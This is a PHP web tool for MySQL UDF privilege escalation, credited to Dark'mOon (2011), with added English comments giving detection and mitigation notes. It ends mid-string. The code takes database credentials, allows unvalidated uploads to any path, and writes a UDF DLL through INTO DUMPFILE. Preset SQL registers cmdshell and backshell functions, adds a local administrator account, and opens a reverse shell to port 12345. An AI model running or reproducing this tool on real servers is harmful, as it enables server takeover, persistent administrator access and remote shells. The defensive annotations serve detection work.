<?php
// Legacy shim: only runs when magic_quotes_gpc is enabled. get_magic_quotes_gpc()
// was deprecated in PHP 7.4 and removed in PHP 8.0, so this file targets old runtimes.
// Effect: the automatic backslash-escaping of request data is undone, so every
// value read from $_POST/$_GET/$_COOKIE below reaches the SQL strings unescaped.
if (get_magic_quotes_gpc()) {
/**
 * Recursively remove backslash escaping from a scalar or a nested array.
 *
 * @param mixed $value A string, or an array of strings/arrays.
 * @return mixed The same structure with stripslashes() applied to each leaf.
 */
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
// Apply the un-escaping to every request superglobal the script reads.
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
// A PHP session is opened; the only session key used in this file is
// $_SESSION['path'], set further down when the DLL target path is computed.
session_start();
// "Logout": expire every connect[...] cookie and redirect back to this script.
// There is no exit after header(), so the rest of the script still executes
// for this request.
if($_GET['action']=='logout'){
foreach($_COOKIE["connect"] as $key=>$value){
setcookie("connect[$key]","",time()-1);
}
header("Location:".$_SERVER["SCRIPT_NAME"]);
}
// "Login": the database host, user, password and schema name from the form are
// copied into cookies in cleartext (setcookie() is called with name and value
// only, so no Secure/HttpOnly attributes are set).
// Detection note: every later request to this script carries cookies named
// connect[host], connect[name], connect[pass] and connect[dbname]; where cookies
// are logged by a proxy or WAF, that set is a usable signature for this tool.
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[name]",$_POST['name']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
// Client-side redirect so the next request arrives with the cookies set.
echo "<script>location.href='?action=connect'</script>";
}
/*
foreach($_COOKIE["connect"] as $key=>$value){
echo $key.":".$value."<br>";
}
*/
// Landing page: when no ?action= parameter is present, render the credential
// form (host / name / pass / dbname, posted to ?action=connect) and stop.
// The password input is type="text", and the page is served to anyone who
// requests it: the visible code performs no authentication of the operator.
// The caption and footer strings below (tool title, author handle, the two
// linked domains) are static text that file-content scanning can match on.
if(empty($_GET["action"])){
?>
<form name="form1" method="post" action="?action=connect">
<div align="center">
<table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
<caption>
<h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
</caption>
<tr>
<td width="66">host:</td>
<td width="270"><input name="host" type="text" id="host" size="34"></td>
</tr>
<tr>
<td>name:</td>
<td><input name="name" type="text" id="name" size="34"></td>
</tr>
<tr>
<td>pass:</td>
<td><input name="pass" type="text" id="pass" size="34"></td>
</tr>
<tr>
<td>dbname:</td>
<td><input name="dbname" type="text" id="dbname" size="34"></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<input type="submit" name="submit" value="提交">
<input type="reset" name="Submit" value="重置">
</div></td>
</tr>
</table>
</div>
</form>
<div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
<a href="http://www.moonhack.org" target="_blank">版本更新</a>
</div>
<?php
// Nothing below runs until an action parameter is supplied.
exit;
}
// Connect to MySQL with the host/user/password taken from the cookies set at
// login. The mysql_* extension used throughout was removed in PHP 7.0, another
// sign that this file only runs on legacy PHP. '@' hides connection warnings.
$link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
if(!$link){
// Failure: print the raw driver error and a "go back" link, then stop.
echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "连接成功<br>";
// Fingerprint the server and print its version string.
$str=mysql_get_server_info();
echo 'MYSQL版本:'.$str."<br>";
echo "<hr>";
// Compares the third character of the version string with 1 -- presumably to
// tell 5.0 servers from 5.1+ ones, which load UDF libraries from plugin_dir.
// NOTE(review): inferred from the two branches; confirm.
if($str[2]>=1){
// Ask the server for its plugin directory and build the target path for the
// DLL there (backslashes normalised to forward slashes).
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]);
$path=$_SESSION['path']=$pa."/moonudf.dll";
}else{
// Otherwise a fixed Windows system directory is used as the target.
$path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
}
}
// Defender note: a file named moonudf.dll appearing in the MySQL plugin
// directory or in C:/WINDOWS is the on-disk indicator this block prepares for.
// Select the schema named in the cookie; the temporary tables created later
// live in this schema.
$conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
if(!$conn){
echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
// The cookie value is echoed back into the page without HTML escaping.
echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
}
// Logout link plus a file-upload form. The text field "p" is pre-filled with
// the directory of this script; the trailing \' inside the double-quoted string
// emits a literal backslash followed by the closing quote of the attribute.
echo '<a href="?action=logout">点击退出</a>';
echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
echo '<table width="297" height="53" border="1">';
echo '<tr>';
echo '<td colspan="2">当前路径:';
echo "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
echo '</tr>';
echo '<tr>';
echo '<td width="235"><input type="file" name="file"></td>';
echo '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
echo '</tr>';
echo '</table>';
echo'</form>';
// Upload handler: the destination is the client-supplied directory "p"
// concatenated with the client-supplied file name. Neither value is validated
// (no extension, type or path checks), so this writes any uploaded content to
// any location the PHP process can write to.
// Mitigation notes for the hosting side: keep the web user without write access
// to script directories, disable script execution in writable directories, and
// alert on new executable or script files created by the web server account.
if($_POST['subfile']){
$upfile=$_POST['p'].$_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name']))
{
if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
echo '上传失败';
}else{
echo '上传成功,路径为'.$upfile;
}
}
}
// Form for writing the bundled UDF library to disk through the database server.
// The text field "dll" displays $path, but the visible code never reads
// $_POST['dll']; the export below always uses the server-side $path value.
echo '<hr>';
echo '<form action="?action=dll" method="post"/>';
echo '<table cellpadding="1" cellspacing="2">';
echo '<tr><td>路径目录为</td></tr>';
echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
echo '</table>';
echo '</form>';
echo '<hr>';
// Export handler. Sequence visible here:
//   1. drop and recreate a one-column BLOB table named Temp_udf,
//   2. insert the value returned by udfcode() (not defined in the visible part
//      of this file) wrapped in CONVERT(...,CHAR),
//   3. SELECT ... INTO DUMPFILE to have mysqld write that value to $path,
//   4. drop the table again.
// The file is written by the MySQL server process, not by PHP, so web-root file
// permissions do not constrain it.
// Mitigation notes: INTO DUMPFILE needs the FILE privilege and is confined by
// secure_file_priv; application accounts should hold neither FILE nor CREATE/DROP
// beyond what they need, and the plugin directory should not be writable by the
// account mysqld runs as. A Temp_udf table left behind in a schema is a leftover
// of a failed run.
if($_POST['subudf']){
mysql_query('DROP TABLE Temp_udf');
$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
if(!$query){
echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
}else{
$shellcode=udfcode();
$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
if(!mysql_query($query)){
echo 'udf插入失败请查看失败内容'.mysql_error();
}else{
$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
if(!mysql_query($query)){
echo 'udf导出失败请查看失败内容'.mysql_error();
}else{
// Only the success path removes the staging table.
mysql_query('DROP TABLE Temp_udf');
echo '导出成功';
}
}
}
}
// "Custom export" form: a source file path ("diy") and a destination path
// ("diypath", pre-filled with C:/WINDOWS/diy.dll).
echo '<form name="form2" method="post" action="">';
echo '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
echo '<tr>';
echo '<td width="83">文件路径:</td>';
echo '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
echo '</tr>';
echo '<tr>';
echo '<td>目标路径:</td>';
echo '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
echo '</tr>';
echo '<tr>';
echo '<td colspan="2">';
echo '<div align="right">';
echo '<input type="submit" name="Submit2" value="自定义导出">';
echo '</div></td></tr>';
echo '</table>';
echo '</form>';
// Handler: copies one server-side file to another location by round-tripping it
// through a LONGBLOB table named diy_dll (load_file() -> hex() on insert,
// unhex() -> INTO DUMPFILE on export). Both paths come straight from POST and
// are interpolated into the SQL text with only backslashes normalised, so the
// statements are also open to SQL injection by whoever submits the form.
// Reads and writes happen with the MySQL server's file permissions.
// Mitigation notes: load_file() and INTO DUMPFILE both require the FILE
// privilege and are restricted by secure_file_priv; a stray diy_dll table is a
// leftover of a failed run.
if(!empty($_POST['diy'])){
$diy=str_replace('\\','/',$_POST['diy']);
$diypath=str_replace('\\','/',$_POST['diypath']);
mysql_query('DROP TABLE diy_dll');
$s='create table diy_dll (cmd LONGBLOB)';
if(!mysql_query($s)){
echo '创建diy_dll表失败'.mysql_error();
}else{
$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
if(!mysql_query($s)){
echo "插入自定义文件失败".mysql_error();
}else{
$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
if(!mysql_query($s)){
echo "导出自定义dll出错".mysql_error();
}else{
// Only the success path removes the staging table.
mysql_query('DROP TABLE diy_dll');
echo "成功出自定义dll<br>";
}
}
}
}
// Preset statement menu. Each <option> value is a complete SQL statement that is
// posted in the field "mysql" and executed verbatim by the handler below.
// What the presets do, as written in the option values:
//   - register / remove UDFs named cmdshell and backshell from moonudf.dll,
//   - run operating-system commands through cmdshell (list users, list ports,
//     create a local account and add it to the Administrators group),
//   - call backshell with the requesting client's address and port 12345,
//   - list registered functions from mysql.func.
// Detection notes: rows in mysql.func named cmdshell or backshell; CREATE
// FUNCTION ... SONAME statements in the general/audit log; mysqld spawning
// child processes such as cmd.exe or net.exe; Windows Security events 4720
// (account created) and 4732 (member added to a local group) on a database
// host; outbound connections from the database host to port 12345.
echo "<hr>";
echo '自带命令:<br>';
echo '<form action="" method="post">';
echo '<select name="mysql">';
echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
echo '<option value="select cmdshell(\'net user\')">查看用户</option>';
echo '<option value="select cmdshell(\'netstat -an\')">查看端口</option>';
echo '<option value="select name from mysql.func">查看创建函数</option>';
echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数</option>';
echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹</option>';
echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
echo '</select>';
echo '<input type="submit" value="提交" />';
echo '</form>';
// Free-form SQL box; it posts the same field name ("mysql") as the menu above.
echo '<form action="?action=sql" method="post">';
echo '自定义SQL语句:<br>';
echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
echo '<input type="submit" value="执行" />';
echo '</form>';
echo "回显结果:<br>";
echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
// Executor: whatever arrives in $_POST['mysql'] is run as-is with the
// privileges of the database account held in the cookies. The assignment inside
// the echo sets $sql to the posted text plus "\r\n" and prints it; $sql is then
// overwritten with the result resource. Every column of every row is printed
// back-to-back with no separator and no HTML escaping.
if(!empty($_POST['mysql'])){
echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
$sql=mysql_query($sql) or die(mysql_error());
while($rows=@mysql_fetch_row($sql)){
foreach($rows as $value){
echo $value;
}
}
}
echo '</textarea><br>';
echo '<hr>';
print("
功能�
暗月mysql全版本通杀提权